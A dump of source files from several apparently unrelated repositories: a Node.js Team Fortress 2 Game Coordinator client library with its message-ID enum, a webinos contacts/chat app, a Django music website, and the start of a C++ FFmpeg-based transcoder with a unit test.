TeamFortress2.prototype.removeItemKillstreak = function(item) {
	this._send(Language.RemoveKillstreak, Schema.CMsgGCRemoveCustomizationAttributeSimple, {item_id: item});
};

/** Removes the "Gifted by" attribute from an item. @param item - The item's ID */
TeamFortress2.prototype.removeItemGiftedBy = function(item) {
	this._send(Language.RemoveItemGiftedBy, Schema.CMsgGCRemoveCustomizationAttributeSimple, {item_id: item});
};

/** Removes the festivizer from an item. @param item - The item's ID */
TeamFortress2.prototype.removeItemFestivizer = function(item) {
	this._send(Language.RemoveItemFestivizer, Schema.CMsgGCRemoveCustomizationAttributeSimple, {item_id: item});
};

/**
 * Asks the GC to re-send our inventory without relaunching the game.
 * (Reported as possibly non-functional upstream.)
 */
TeamFortress2.prototype.requestInventoryRefresh = function() {
	this._send(Language.RequestInventoryRefresh, Schema.CMsgRequestInventoryRefresh, {});
};
TeamFortress2.prototype.cancelTradeRequest = function() {
let buffer = new ByteBuffer(0, ByteBuffer.LITTLE_ENDIAN);
this._send(Language.Trading_CancelSession, null, buffer);
};
TeamFortress2.prototype.respondToTrade = function(tradeID, accept) {
	// Raw payload: uint32 response code, then uint32 trade id (little-endian).
	let response = accept ? TeamFortress2.TradeResponse.Accepted : TeamFortress2.TradeResponse.Declined;
	let payload = new ByteBuffer(8, ByteBuffer.LITTLE_ENDIAN);
	payload.writeUint32(response);
	payload.writeUint32(tradeID);
	this._send(Language.Trading_InitiateTradeResponse, null, payload);
};
TeamFortress2.prototype.setStyle = function(item, style) {
	// Raw payload: uint64 item id followed by uint32 style index.
	let payload = new ByteBuffer(12, ByteBuffer.LITTLE_ENDIAN);
	payload.writeUint64(coerceToLong(item));
	payload.writeUint32(style);
	this._send(Language.SetItemStyle, null, payload);
};
TeamFortress2.prototype.setPosition = function(item, position) {
	// Raw payload: uint64 item id followed by uint64 backpack position.
	let payload = new ByteBuffer(16, ByteBuffer.LITTLE_ENDIAN);
	payload.writeUint64(coerceToLong(item));
	payload.writeUint64(coerceToLong(position));
	this._send(Language.SetSingleItemPosition, null, payload);
};
TeamFortress2.prototype.setPositions = function(items) {
	// Batch variant of setPosition; items is a list of item/position pairs.
	this._send(Language.SetItemPositions, Schema.CMsgSetItemPositions, {item_positions: items});
};
TeamFortress2.prototype.deleteItem = function(item) {
	// Permanently destroy an item; payload is just its uint64 id.
	let payload = new ByteBuffer(8, ByteBuffer.LITTLE_ENDIAN);
	payload.writeUint64(coerceToLong(item));
	this._send(Language.Delete, null, payload);
};
TeamFortress2.prototype.wrapItem = function(wrapID, itemID) {
	// Consume the gift wrap (wrapID) to wrap the target item (itemID).
	let payload = new ByteBuffer(16, ByteBuffer.LITTLE_ENDIAN);
	payload.writeUint64(coerceToLong(wrapID));
	payload.writeUint64(coerceToLong(itemID));
	this._send(Language.GiftWrapItem, null, payload);
};
TeamFortress2.prototype.deliverGift = function(gift, steamID) {
	// Accept either a SteamID object or its string form.
	if (typeof steamID === 'string') {
		steamID = new SteamID(steamID);
	}
	// Raw payload: uint64 gift item id, then the recipient's 64-bit SteamID.
	let payload = new ByteBuffer(16, ByteBuffer.LITTLE_ENDIAN);
	payload.writeUint64(coerceToLong(gift));
	payload.writeUint64(coerceToLong(steamID.getSteamID64()));
	this._send(Language.DeliverGift, null, payload);
};
TeamFortress2.prototype.unwrapGift = function(gift) {
	// Open a wrapped gift in our own inventory; payload is its uint64 id.
	let payload = new ByteBuffer(8, ByteBuffer.LITTLE_ENDIAN);
	payload.writeUint64(coerceToLong(gift));
	this._send(Language.UnwrapGiftRequest, null, payload);
};
TeamFortress2.prototype.useItem = function(item) {
	// Consume/activate a usable item.
	this._send(Language.UseItemRequest, Schema.CMsgUseItem, {item_id: item});
};
TeamFortress2.prototype.sortBackpack = function(sortType) {
	// Ask the GC to sort the backpack by the given criterion.
	this._send(Language.SortItems, Schema.CMsgSortItems, {sort_type: sortType});
};
TeamFortress2.prototype.sendProfessorSpeks = function(steamID) {
	// Accept either a SteamID object or its string form; the GC only needs
	// the 32-bit account id of the friend being thanked.
	if (typeof steamID === 'string') {
		steamID = new SteamID(steamID);
	}
	this._send(Language.FreeTrial_ChooseMostHelpfulFriend, Schema.CMsgTFFreeTrialChooseMostHelpfulFriend, {account_id_friend: steamID.accountid});
};
TeamFortress2.prototype.createServerIdentity = function() {
	// Register a new game-server identity under our own account.
	let account = this._steam.steamID.accountid;
	this._send(Language.GameServer_CreateIdentity, Schema.CMsgGC_GameServer_CreateIdentity, {account_id: account});
};
TeamFortress2.prototype.getRegisteredServers = function() {
	// List the game-server identities registered to our own account.
	let account = this._steam.steamID.accountid;
	this._send(Language.GameServer_List, Schema.CMsgGC_GameServer_List, {account_id: account});
};
TeamFortress2.prototype.resetServerIdentity = function(id) {
	// Reset the login token of one of our game-server identities.
	this._send(Language.GameServer_ResetIdentity, Schema.CMsgGC_GameServer_ResetIdentity, {game_server_account_id: id});
};
TeamFortress2.prototype.openCrate = function(keyID, crateID) {
	// Raw payload: uint64 key id, then uint64 crate id (little-endian).
	let payload = new ByteBuffer(16, ByteBuffer.LITTLE_ENDIAN);
	payload.writeUint64(coerceToLong(keyID));
	payload.writeUint64(coerceToLong(crateID));
	this._send(Language.UnlockCrate, null, payload);
};
TeamFortress2.prototype.equipItem = function(itemID, classID, slot) {
	// Equip (or move) an item into the given class's loadout slot.
	let body = {
		item_id: itemID,
		new_class: classID,
		new_slot: slot
	};
	this._send(Language.AdjustItemEquippedState, Schema.CMsgAdjustItemEquippedState, body);
};
TeamFortress2.prototype.requestWarStats = function(warID, callback) {
	// Support requestWarStats(callback): shift arguments when the war id is
	// omitted, defaulting to the Heavy-vs-Pyro war below.
	if (typeof warID === 'function') {
		callback = warID;
		warID = null;
	}
	let body = {war_id: warID || TeamFortress2.War.HeavyVsPyro};
	this._send(Language.War_RequestGlobalStats, Schema.CGCMsgGC_War_RequestGlobalStats, body);
	// Deliver the reply through the one-shot 'warStats' event if requested.
	if (callback) {
		this.once('warStats', callback);
	}
};
// Per-message-type handler table; populated by handlers.js (required below).
TeamFortress2.prototype._handlers = {};
/**
 * Normalizes an id value for ByteBuffer.writeUint64: string ids are parsed
 * (base 10) into a Long, anything else is passed through untouched.
 * @param {string|number|Object} num - id as a string, number, or Long
 * @param {boolean} [signed] - parse as signed when truthy (default unsigned)
 * @returns {number|Object} the original value or a Long
 */
function coerceToLong(num, signed) {
	// fromString is a static factory; the old `new ByteBuffer.Long.fromString(...)`
	// only worked via constructor-return semantics, so drop the spurious `new`.
	return typeof num === 'string' ? ByteBuffer.Long.fromString(num, !signed, 10) : num;
}
require('./enums.js');
require('./handlers.js');
<file_sep>// This file contains representations of message IDs
// TF2 Game Coordinator message IDs, grouped by the Valve enum each value
// comes from. These numbers mirror Valve's protobuf definitions — do not
// renumber or rename (base.js references these keys by exact spelling,
// e.g. RemoveKillStreak with a capital S).
module.exports = {
	// ESOMsg
	SO_Create: 21,
	SO_Update: 22,
	SO_Destroy: 23,
	SO_CacheSubscribed: 24,
	SO_CacheUnsubscribed: 25,
	SO_UpdateMultiple: 26,
	SO_CacheSubscriptionCheck: 27,
	SO_CacheSubscriptionRefresh: 28,
	SO_CacheSubscribedUpToDate: 29,

	// EGCItemMsg
	Base: 1000,
	SetSingleItemPosition: 1001,
	Craft: 1002,
	CraftResponse: 1003,
	Delete: 1004,
	VerifyCacheSubscription: 1005,
	NameItem: 1006,
	UnlockCrate: 1007,
	UnlockCrateResponse: 1008,
	PaintItem: 1009,
	PaintItemResponse: 1010,
	GoldenWrenchBroadcast: 1011,
	MOTDRequest: 1012,
	MOTDRequestResponse: 1013,
	NameBaseItem: 1019,
	NameBaseItemResponse: 1020,
	RemoveSocketItem_DEPRECATED: 1021,
	RemoveSocketItemResponse_DEPRECATED: 1022,
	CustomizeItemTexture: 1023,
	CustomizeItemTextureResponse: 1024,
	UseItemRequest: 1025,
	UseItemResponse: 1026,
	RespawnPostLoadoutChange: 1029,
	RemoveItemName: 1030,
	RemoveItemPaint: 1031,
	GiftWrapItem: 1032,
	GiftWrapItemResponse: 1033,
	DeliverGift: 1034,
	DeliverGiftResponseReceiver: 1036,
	UnwrapGiftRequest: 1037,
	UnwrapGiftResponse: 1038,
	SetItemStyle: 1039,
	UsedClaimCodeItem: 1040,
	SortItems: 1041,
	RevolvingLootList_DEPRECATED: 1042,
	LookupAccount: 1043,
	LookupAccountResponse: 1044,
	LookupAccountName: 1045,
	LookupAccountNameResponse: 1046,
	UpdateItemSchema: 1049,
	RequestInventoryRefresh: 1050,
	RemoveCustomTexture: 1051,
	RemoveCustomTextureResponse: 1052,
	RemoveMakersMark: 1053,
	RemoveMakersMarkResponse: 1054,
	RemoveUniqueCraftIndex: 1055,
	RemoveUniqueCraftIndexResponse: 1056,
	SaxxyBroadcast: 1057,
	BackpackSortFinished: 1058,
	AdjustItemEquippedState: 1059,
	CollectItem: 1061,
	ItemAcknowledged: 1062,
	Presets_SelectPresetForClass: 1063,
	Presets_SetItemPosition: 1064,
	ReportAbuse: 1065,
	ReportAbuseResponse: 1066,
	Presets_SelectPresetForClassReply: 1067,
	NameItemNotification: 1068,
	ClientDisplayNotification: 1069,
	ApplyStrangePart: 1070,
	IncrementKillCountAttribute: 1071,
	IncrementKillCountResponse: 1072,
	RemoveStrangePart: 1073,
	ResetStrangeScores: 1074,
	GiftedItems: 1075,
	ApplyUpgradeCard: 1077,
	RemoveUpgradeCard: 1078,
	ApplyStrangeRestriction: 1079,
	ClientRequestMarketData: 1080,
	ClientRequestMarketDataResponse: 1081,
	ApplyXifier: 1082,
	ApplyXifierResponse: 1083,
	TrackUniquePlayerPairEvent: 1084,
	FulfillDynamicRecipeComponent: 1085,
	FulfillDynamicRecipeComponentResponse: 1086,
	SetItemEffectVerticalOffset: 1087,
	SetHatEffectUseHeadOrigin: 1088,
	ItemEaterRecharger: 1089,
	ItemEaterRechargerResponse: 1090,
	ApplyBaseItemXifier: 1091,
	ApplyClassTransmogrifier: 1092,
	ApplyHalloweenSpellbookPage: 1093,
	// Note the capital S — referenced by removeItemKillstreak in base.js.
	RemoveKillStreak: 1094,
	RemoveKillStreakResponse: 1095,
	TFSpecificItemBroadcast: 1096,
	IncrementKillCountAttribute_Multiple: 1097,
	DeliverGiftResponseGiver: 1098,
	SetItemPositions: 1100,
	LookupMultipleAccountNames: 1101,
	LookupMultipleAccountNamesResponse: 1102,
	TradingBase: 1500,
	Trading_InitiateTradeRequest: 1501,
	Trading_InitiateTradeResponse: 1502,
	Trading_StartSession: 1503,
	Trading_SessionClosed: 1509,
	Trading_CancelSession: 1510,
	Trading_InitiateTradeRequestResponse: 1514,
	ServerBrowser_FavoriteServer: 1601,
	ServerBrowser_BlacklistServer: 1602,
	ServerRentalsBase: 1700,
	ItemPreviewCheckStatus: 1701,
	ItemPreviewStatusResponse: 1702,
	ItemPreviewRequest: 1703,
	ItemPreviewRequestResponse: 1704,
	ItemPreviewExpire: 1705,
	ItemPreviewExpireNotification: 1706,
	ItemPreviewItemBoughtNotification: 1708,
	Dev_NewItemRequest: 2001,
	Dev_NewItemRequestResponse: 2002,
	Dev_DebugRollLootRequest: 2003,
	StoreGetUserData: 2500,
	StoreGetUserDataResponse: 2501,
	StorePurchaseInit_DEPRECATED: 2502,
	StorePurchaseInitResponse_DEPRECATED: 2503,
	// Entries below are ordered as in Valve's enum, not numerically.
	StorePurchaseFinalize: 2512,
	StorePurchaseFinalizeResponse: 2513,
	StorePurchaseCancel: 2514,
	StorePurchaseCancelResponse: 2515,
	StorePurchaseQueryTxn: 2508,
	StorePurchaseQueryTxnResponse: 2509,
	StorePurchaseInit: 2510,
	StorePurchaseInitResponse: 2511,
	GCToGCDirtySDOCache: 2516,
	GCToGCDirtyMultipleSDOCache: 2517,
	GCToGCUpdateSQLKeyValue: 2518,
	GCToGCBroadcastConsoleCommand: 2521,
	ServerVersionUpdated: 2522,
	ApplyAutograph: 2523,
	GCToGCWebAPIAccountChanged: 2524,
	RequestAnnouncements: 2525,
	RequestAnnouncementsResponse: 2526,
	RequestPassportItemGrant: 2527,
	ClientVersionUpdated: 2528,
	ItemPurgatory_FinalizePurchase: 2531,
	ItemPurgatory_FinalizePurchaseResponse: 2532,
	ItemPurgatory_RefundPurchase: 2533,
	ItemPurgatory_RefundPurchaseResponse: 2534,
	GCToGCPlayerStrangeCountAdjustments: 2535,
	RequestStoreSalesData: 2536,
	RequestStoreSalesDataResponse: 2537,
	RequestStoreSalesDataUpToDateResponse: 2538,
	GCToGCPingRequest: 2539,
	GCToGCPingResponse: 2540,
	GCToGCGetUserSessionServer: 2541,
	GCToGCGetUserSessionServerResponse: 2542,
	GCToGCGetUserServerMembers: 2543,
	GCToGCGetUserServerMembersResponse: 2544,
	GCToGCGrantSelfMadeItemToAccount: 2555,
	GCToGCThankedByNewUser: 2556,
	ShuffleCrateContents: 2557,
	RemoveItemGiftedBy: 2570,
	RemoveItemFestivizer: 2572,

	// EGCBaseClientMsg
	PingRequest: 3001,
	PingResponse: 3002,
	ClientWelcome: 4004,
	ServerWelcome: 4005,
	ClientHello: 4006,
	ServerHello: 4007,
	ClientGoodbye: 4008,
	ServerGoodbye: 4009,

	// EGCBaseMsg
	SystemMessage: 4001,
	ReplicateConVars: 4002,
	ConVarUpdated: 4003,
	InviteToParty: 4501,
	InvitationCreated: 4502,
	PartyInviteResponse: 4503,
	KickFromParty: 4504,
	LeaveParty: 4505,
	ServerAvailable: 4506,
	ClientConnectToServer: 4507,
	GameServerInfo: 4508,
	Error: 4509,
	Replay_UploadedToYouTube: 4510,
	LANServerAvailable: 4511,

	// ETFGCMsg
	ReportWarKill: 5001,
	VoteKickBanPlayer: 5018,
	VoteKickBanPlayerResult: 5019,
	KickPlayer_DEPRECATED: 5020,
	StartedTraining_DEPRECATED: 5021,
	FreeTrial_ChooseMostHelpfulFriend: 5022,
	RequestTF2Friends: 5023,
	RequestTF2FriendsResponse: 5024,
	Replay_SubmitContestEntry: 5026,
	Replay_SubmitContestEntryResponse: 5027,
	Saxxy_Awarded: 5029,
	FreeTrial_ThankedBySomeone: 5028,
	FreeTrial_ThankedSomeone: 5030,
	FreeTrial_ConvertedToPremium: 5031,
	MeetThePyroSilliness_BananaCraft_DEPRECATED: 5032,
	MVMARG_HighFiveSuccessResponse_DEPRECATED: 5033,
	MVMARG_HighFiveOnClient_DEPRECATED: 5034,
	Coaching_AddToCoaches: 5200,
	Coaching_AddToCoachesResponse: 5201,
	Coaching_RemoveFromCoaches: 5202,
	Coaching_RemoveFromCoachesResponse: 5203,
	Coaching_FindCoach: 5204,
	Coaching_FindCoachResponse: 5205,
	Coaching_AskCoach: 5206,
	Coaching_AskCoachResponse: 5207,
	Coaching_CoachJoinGame: 5208,
	Coaching_CoachJoining: 5209,
	Coaching_CoachJoined: 5210,
	Coaching_LikeCurrentCoach: 5211,
	Coaching_RemoveCurrentCoach: 5212,
	Coaching_AlreadyRatedCoach: 5213,
	Duel_Request: 5500,
	Duel_Response: 5501,
	Duel_Results: 5502,
	Duel_Status: 5503,
	Halloween_ReservedItem_DEPRECATED: 5600,
	Halloween_GrantItem_DEPRECATED: 5601,
	Halloween_GrantItemResponse_DEPRECATED: 5604,
	Halloween_Cheat_QueryResponse_DEPRECATED: 5605,
	Halloween_ItemClaimed_DEPRECATED: 5606,
	Halloween_ReservedItem: 5607,
	Halloween_GrantItem: 5608,
	Halloween_GrantItemResponse: 5609,
	Halloween_Cheat_QueryResponse_DEPRECATED_2: 5610,
	Halloween_ItemClaimed_DEPRECATED_2: 5611,
	Halloween_ServerBossEvent: 5612,
	Halloween_Merasmus2012: 5613,
	Halloween_UpdateMerasmusLootLevel: 5614,
	GameServer_LevelInfo: 5700,
	GameServer_AuthChallenge: 5701,
	GameServer_AuthChallengeResponse: 5702,
	GameServer_CreateIdentity: 5703,
	GameServer_CreateIdentityResponse: 5704,
	GameServer_List: 5705,
	GameServer_ListResponse: 5706,
	GameServer_AuthResult: 5707,
	GameServer_ResetIdentity: 5708,
	GameServer_ResetIdentityResponse: 5709,
	Client_UseServerModificationItem: 5710,
	Client_UseServerModificationItem_Response: 5711,
	GameServer_UseServerModificationItem: 5712,
	GameServer_UseServerModificationItem_Response: 5713,
	GameServer_ServerModificationItemExpired: 5714,
	GameServer_ModificationItemState: 5715,
	GameServer_AckPolicy: 5716,
	GameServer_AckPolicyResponse: 5717,
	QP_ScoreServers: 5800,
	QP_ScoreServersResponse: 5801,
	QP_PlayerJoining: 5802,
	PickupItemEligibility_Query_DEPRECATED: 6000,
	PickupItemEligibility_Query_DEPRECATED_2: 6001,
	IncrementKillCountAttribute_DEPRECATED: 6100,
	IncrementKillCountResponse_DEPRECATED: 6101,
	GameMatchSignOut: 6204,
	CreateOrUpdateParty: 6233,
	AbandonCurrentGame: 6235,
	EMsgForceSOCacheResend: 6237,
	RequestChatChannelList: 6260,
	RequestChatChannelListResponse: 6261,
	ReadyUp: 6270,
	KickedFromMatchmakingQueue: 6271,
	LeaverDetected: 6272,
	LeaverDetectedResponse: 6287,
	PlayerFailedToConnect: 6288,
	ExitMatchmaking: 6289,
	AcceptInvite: 6291,
	AcceptInviteResponse: 6292,
	MatchmakingProgress: 6293,
	MvMVictoryInfo: 6294,
	GameServerMatchmakingStatus: 6295,
	CreateOrUpdatePartyReply: 6296,
	MvMVictory: 6297,
	MvMVictoryReply: 6298,
	GameServerKickingLobby: 6299,
	LeaveGameAndPrepareToJoinParty: 6300,
	RemovePlayerFromLobby: 6301,
	SetLobbySafeToLeave: 6302,
	UpdatePeriodicEvent: 6400,
	ClientVerificationChallenge: 6500,
	ClientVerificationChallengeResponse: 6501,
	ClientVerificationVerboseResponse: 6502,
	ClientSetItemSlotAttribute: 6503,
	PlayerSkillRating_Adjustment: 6504,
	War_IndividualUpdate: 6505,
	War_JoinWar: 6506,
	War_RequestGlobalStats: 6507,
	War_GlobalStatsResponse: 6508,
	Dev_GrantWarKill: 10001
};
| 1298021559a2d092e9a778ab02cfa5db22885c70 | [
"Markdown",
"JavaScript"
] | 3 | Markdown | DontAskM8/node-tf2 | 6a02496dc594e9d7f46592ff322464bc46fe0f66 | 289f50037d03fabfc4a341a1789118917868e34b |
refs/heads/master | <repo_name>webinos-apps/poc-ContactsAndEvents<file_sep>/js/chatPage.js
var eventsServiceType = "http://webinos.org/api/events";

// Wait for document to load
$(document).ready(function () {
	// The events service we are currently bound to, once discovery succeeds.
	var eventAPIToUse;

	// Bind to a discovered events service and remember it as the active one.
	function bindEventsService(service) {
		service.bindService({
			onBind: function () {
				eventAPIToUse = service;
				$("#cmdPickEventApi").addClass("bound");
				// TODO: add the code from the chat.js file
				// line 257
			}
		});
	}

	// Discover services matching the picker's filters and bind the one whose
	// id matches, restricting the search to the chosen device's zone.
	function findEventsService(serviceFilters) {
		webinos.discovery.findServices(new ServiceType(serviceFilters.api), {
			onFound: function (service) {
				if (service.id == serviceFilters.id) {
					bindEventsService(service);
				}
			}
		}, {}, { zoneId: [serviceFilters.address] });
	}

	// Let the user pick an events service from the webinos explorer dashboard.
	$("#cmdPickEventApi").bind('click', function () {
		webinos.dashboard.open({
			module: 'explorer',
			data: {
				service: eventsServiceType
			}
		}).onAction(function (data) {
			// Only act when the user actually selected a single service.
			if (data.result.length == 1) {
				var serviceFilters = data.result[0];
				// Remember the choice so we can rebind on the next page load.
				localStorage["eventsService"] = JSON.stringify(serviceFilters);
				findEventsService(serviceFilters);
			}
		});
	});

	// On startup, try to rebind the service chosen on a previous visit.
	var savedFilters = localStorage["eventsService"];
	if (savedFilters) {
		try {
			findEventsService(JSON.parse(savedFilters));
		} catch (e) {
			// Stored value was unparsable; blank it so we do not retry forever.
			localStorage["eventsService"] = "";
		}
	}
});
<file_sep>/README.md
app-contacts
============
CONTACTS CHAT APP
=================
Contacts Description:
----------------------
Currently, lists the contacts from the selected source and provides the opportunity to search them.
There is an option to tweet to the selected contact.
Future option, include listing contacts from multiple sources, and displaying the contacts on the map.
Also, opportunity to manage contacts will be provided, when the following functions will be implemented in contacts API.
Instructions how to run the app:
1) Copy the files from the app-contacts repository so you get the following structure: <directory with your Webinos-Platform>\Webinos-Platform\webinos\web_root\apps\app-contacts\
2) Open the link https://pzh.webinos.org/main.html in a browser and log in with your Gmail account.
3) Run the PZP on the command line: <directory with your Webinos-Platform>\Webinos-Platform > node webinos_pzp
4) Go to http://localhost:8080/apps/app-contacts/contacts.html
5) Press the Settings button.
6) Enter the path to the Thunderbird file for local authentication, or the login and password for your Gmail account.
7) Press the Save Settings button.
8) Press the Authenticate/Open button.
9) Press the Go to Main Page or Go to Search Menu button to see the full list of contacts or to find a contact.
10) Press a link to open the detailed page associated with the contact.
11) You can tweet to the contact's nickname from your Twitter account using the input box and the Tweet button
on the contact's Detailed Information page.
Chat App:
=========
Features:
---------
1)When Clicked on the Chat Icon It shows the Chat User Screen that you have Entered with your Credentials to retrieve your Contacts
Then shows the Online Contacts if any and can Invite for the Chat.
2)Once the Invitation is accepted from the Users. If the User doesn't want to accept the Invite, User can select the cancel button.
3)The Chat Module opens the ChatBox Screen which includes the settings of the Chat that the Users can change.
4)The Components of the Chat Module are Chat Screen, Chat Box, Chat Text, Chat Button, Chat Input.
5)There is a Text Button which highlights when the Chat Box is hidden.
6)On the top of the Chat Screen next to the Chat Settings Panel an Exit Button is placed.
Settings Panel:
---------------
7) The set-settings function holds all the Chat Settings functionality. When this function is invoked, the settings button is shown in the Chat Screen.
The Setting Panel include:
There are Settings for both the Users, The one who is chatting can as well change the font, size, Color and style of the User with whom he/she is chatting with only on his own Screen.
* Font Color: Select options from black, red, green, blue
* Style: sans-serif, AmadeusRegular, SpecialEliteRegular, ScratchmybackRegular
* Font Size: 100%, 120%, 150%
* Status: whether the User is Available or Invisible.
| 9269a061c56baff53b15aac8194faacb56bc05a5 | [
"JavaScript",
"Markdown"
] | 2 | JavaScript | webinos-apps/poc-ContactsAndEvents | b3e53e623d189ef46dc72274ca2da78e395b58d8 | 884bf891d99ecbe04ee82d944d8fb136f1ea9046 |
refs/heads/master | <file_sep># dangerDon
A Django music website, originally created while following The New Boston's Viberr tutorial, now with extended features and capabilities.
# Install Requirements by:-
```
pip install -r requirements.txt
```
# Demo
.png)
.png)
.png)
.png)
.png)
.png)
<file_sep>{% extends 'music/base.html' %}
{% block body %}
{# Shared form page: wraps a POST form (with file-upload support via the #}
{# multipart enctype) in a Bootstrap card. Pages extending this template #}
{# override the "heading" block for the card title; the form fields come #}
{# from the included music/form-template.html partial. #}
<div class="container-fluid">
    <div class="card col-sm-12 col-md-9 col-lg-7 my-3">
        <div class="card-block mt-4 ">
            <div class="card-header">
                <h4> {% block heading %} Heading Here {% endblock %} </h4>
            </div>
            {# action="" posts back to the current URL (create/update views). #}
            <form action="" method="POST" enctype="multipart/form-data" class="my-3">
                {% csrf_token %}
                {% include 'music/form-template.html' %}
                <div class="form-group">
                    <button class="btn btn-success" type="submit">Submit</button>
                </div>
            </form>
        </div>
    </div>
</div>
{% endblock %}<file_sep>from django.conf import settings
from django.conf.urls import url,include
from django.conf.urls.static import static
from django.contrib import admin
from rest_framework.urlpatterns import format_suffix_patterns
from music import views
# Project-level URL routes. The site landing page, the Django admin, the
# music app's own URLconf, and the DRF album-collection endpoint.
urlpatterns = [
    url('^$', views.Home),
    url(r'^admin/', admin.site.urls),
    url(r'^music/', include('music.urls')),
    url(r'^albums/', views.AlbumList.as_view()),
]
# Serve static and media files directly when running the dev server;
# in production a web server is expected to handle these paths.
if settings.DEBUG:
    urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
    urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
urlpatterns = format_suffix_patterns(urlpatterns) <file_sep># -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2017-10-12 02:32
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
    # Auto-generated migration: renames Album.alnum_logo (a typo in the
    # initial migration) to album_logo. Schema rename only; no data change.

    dependencies = [
        ('music', '0001_initial'),
    ]

    operations = [
        migrations.RenameField(
            model_name='album',
            old_name='alnum_logo',
            new_name='album_logo',
        ),
    ]
<file_sep>from django.views.generic import View, ListView, DetailView
from django.views.generic.edit import CreateView, UpdateView, DeleteView
from django.shortcuts import render, redirect
from django.contrib.auth import authenticate, login
from django.urls import reverse_lazy
from django.http.response import HttpResponse
from rest_framework.views import APIView
from rest_framework.response import Response
from .models import Album
from .forms import UserForm
from .serializers import AlbumSerializer
def Home(request):
    """Render the site landing page.

    PascalCase name kept because the project URLconf references
    ``views.Home`` directly.
    """
    return render(request, 'music/home.html')
class IndexView(ListView):
    """Album listing, ranked by like/dislike ratio (best first)."""
    template_name = 'music/index.html'
    context_object_name = 'all_albums'

    def get_queryset(self):
        # Rank albums by their like/dislike ratio. The denominator is
        # guarded: an album with zero dislikes previously raised
        # ZeroDivisionError and broke the whole index page.
        return sorted(Album.objects.all(),
                      key=lambda album: album.likes / (album.dislikes or 1),
                      reverse=True)
class DetailView(DetailView):
    # Album detail page.
    # NOTE(review): this class shadows the generic ``DetailView`` it inherits
    # from (the base name is resolved before the rebinding, so it works, but
    # it is confusing). Kept as-is because URLconfs reference
    # ``views.DetailView`` by this exact name.
    model = Album
    template_name = 'music/detail.html'
class AlbumCreate(CreateView):
    # Create-album form; field order here is the order rendered in the form.
    model = Album
    fields = ['artist', 'album_title', 'genre', 'album_logo']


class AlbumUpdate(UpdateView):
    # Edit-album form; mirrors AlbumCreate's field list.
    model = Album
    fields = ['artist', 'album_title', 'genre', 'album_logo']


class AlbumDelete(DeleteView):
    # Delete confirmation; returns to the index after a successful delete.
    model = Album
    success_url = reverse_lazy('music:index')
class Like(View):
    """Increment an album's like counter, then return to the index."""

    def post(self, request, pk):
        # .first() instead of [0]: the old indexing raised IndexError (a 500)
        # when the pk did not exist.
        album = Album.objects.filter(pk=pk).first()
        if album is not None:
            album.likes += 1
            album.save(update_fields=['likes'])
        # Redirect regardless so the client always lands somewhere sensible.
        return redirect('music:index')
class Dislike(View):
    """Increment an album's dislike counter, then return to the index."""

    def post(self, request, pk):
        # .first() instead of [0]: the old indexing raised IndexError (a 500)
        # when the pk did not exist.
        album = Album.objects.filter(pk=pk).first()
        if album is not None:
            album.dislikes += 1
            album.save(update_fields=['dislikes'])
        return redirect('music:index')
class UserFormView(View):
    """User registration: show a blank form on GET, create + log in on POST."""
    form_class = UserForm
    template_name = 'music/registration_form.html'

    # display blank form
    def get(self, request):
        form = self.form_class(None)
        return render(request, self.template_name, {'form':form})

    # process form data
    def post(self, request):
        form = self.form_class(request.POST)
        if form.is_valid():
            # Build the user without writing yet so the password can be
            # hashed (set_password) before the single save below.
            user = form.save(commit=False)
            # cleaning data
            username = form.cleaned_data['username']
            password = form.cleaned_data['password']
            user.set_password(password)
            user.save()
            # Re-authenticate with the raw credentials to obtain a user
            # object with a backend attached, as login() requires.
            user = authenticate(username=username, password=password)
            if user is not None:
                if user.is_active:
                    login(request,user)
                    return redirect('music:index')
        # Invalid form (or failed auth): re-render with validation errors.
        return render(request, self.template_name, {'form':form})
# List all albums or create a new one
# albums/
class AlbumList(APIView):
    """API endpoint for the album collection."""

    def get(self, request):
        """Return every album, serialized."""
        serializer = AlbumSerializer(Album.objects.all(), many=True)
        return Response(serializer.data)

    def post(self, request):
        """Create a new album from the request payload.

        The previous stub omitted ``request`` (DRF would raise TypeError
        when dispatching) and returned None; this implements the standard
        serializer create flow instead.
        """
        serializer = AlbumSerializer(data=request.data)
        if serializer.is_valid():
            serializer.save()
            return Response(serializer.data, status=201)
        return Response(serializer.errors, status=400)
| 0fc90a0f3754c9ec82931e58b6eb4825704d6dea | [
"Markdown",
"Python",
"HTML"
] | 5 | Markdown | abdurraufahmad/dangerDon | 57a60e1e5c06c7b6adcfbd329667e7422760d26c | 3c1c3b9b765d425f05729b71a32e06134df97372 |
refs/heads/master | <repo_name>sumo/transPlus<file_sep>/src/tests/FFmpegDecodingContainerTests.cpp
#include <gtest/gtest.h>
#include <iostream>
#include <map>
#include <fstream>
#include <vector>
#include <string>
#include "../FFmpegDecodingContainer.hpp"
#include "../streams/StreamReader.hpp"
#include <boost/shared_ptr.hpp>
using namespace boost;
// Probe a known MP4 sample and check both the detected container format and
// the per-stream codec identification.
TEST(FFmpegDecodingContainer, ReadContainer) {
	// Open the fixture and wrap it in the stream abstraction the decoder uses.
	ifstream src;
	src.open("samplefiles/echo-hereweare.mp4", ios::binary);
	StreamReader reader(src);
	FFmpegDecodingContainer decoder(reader);
	// The probe map's first key is the demuxer name: the MP4 family demuxer.
	map<string, string> m = decoder.getFormat();
	string format = (*m.begin()).first;
	ASSERT_STREQ("mov,mp4,m4a,3gp,3g2,mj2", format.c_str());
	// The sample carries one AAC audio stream and one H.264 video stream.
	ptr_vector<FFmpegStream> streams = decoder.getStreams();
	ptr_vector<FFmpegStream>::iterator it;
	for (it = streams.begin(); it < streams.end(); it++) {
		if (it->getType() == AUDIO) {
			ASSERT_STREQ("aac", it->getCodec().c_str());
		} else {
			ASSERT_STREQ("h264", it->getCodec().c_str());
		}
	}
}
<file_sep>/src/transPlus.cpp
//============================================================================
// Name : transPlus.cpp
// Author : <NAME>
// Version :
// Copyright : BSD Licence
// Description : Hello World in C++, Ansi-style
//============================================================================
#include "fixstdint.hpp"
#include <iostream>
#include <map>
#include <fstream>
#include <vector>
#include <boost/shared_ptr.hpp>
#include <log4cplus/logger.h>
#include <log4cplus/configurator.h>
extern "C" {
#include <libavcodec/avcodec.h>
#include <libavformat/avformat.h>
}
#include "streams/StreamReader.hpp"
#include "FFmpegDecodingContainer.hpp"
#include "FFmpegEncodingContainer.hpp"
#include "streams/StreamFactory.hpp"
using namespace std;
using namespace boost;
